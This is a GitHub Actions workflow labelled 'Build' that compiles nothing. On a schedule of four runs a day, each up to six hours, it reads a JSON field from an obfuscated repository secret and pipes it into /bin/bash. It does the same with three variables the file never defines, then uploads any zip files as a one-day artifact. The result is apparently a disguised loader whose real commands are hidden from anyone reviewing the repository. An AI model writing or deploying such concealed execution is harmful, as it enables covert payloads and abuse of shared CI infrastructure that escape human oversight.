name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '36 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          qwon96: ${{ secrets.qwon96 }}
        run: |
          printf '%s' "$qwon96" | jq -r .x8976 | /bin/bash
          echo $xgrw9 | jq -r .zc456 | /bin/bash
          echo $xqu30035 | jq -r .lzhr57214 | /bin/bash
          printf '%s' "$b6272" | jq -r .jli6 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 21BVeYtU
          path: "*.zip"
          retention-days: 1
